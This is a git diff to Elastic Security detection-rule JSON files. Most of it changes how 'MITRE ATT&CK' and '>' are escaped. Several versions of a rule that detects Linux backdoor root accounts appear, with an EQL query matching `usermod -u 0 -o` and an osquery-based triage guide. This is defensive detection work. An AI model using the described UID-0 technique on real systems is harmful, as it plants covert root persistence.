diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json
index 073338fe4c7..d77a73b5255 100644
--- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_106.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json
index 71e9cd35e5a..3a193848871 100644
--- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json
index 3039c1d345f..0be9a209737 100644
--- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json
index 3ef3fec469e..7d7ba6be4d1 100644
--- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_104.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json
index abe4f42b216..2c9bf7a4364 100644
--- a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_105.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json
index 6f13bd4366a..2819141e047 100644
--- a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_1.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json
index edea919006d..c57a6c69f8a 100644
--- a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_100.json
@@ -34,7 +34,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json
index 46b7765d6ad..acf3add38a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json
index 55ae1d3e313..aed3966065d 100644
--- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json
index 13e6840da4d..00f8673e920 100644
--- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. 
\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json
index 30667287c1f..d3319b05b51 100644
--- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. 
\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json
index a021bdf8afe..5295724afab 100644
--- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. 
\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n",
 "related_integrations": [
 {
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json
index f42293b1abc..18d54b15d6d 100644
--- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
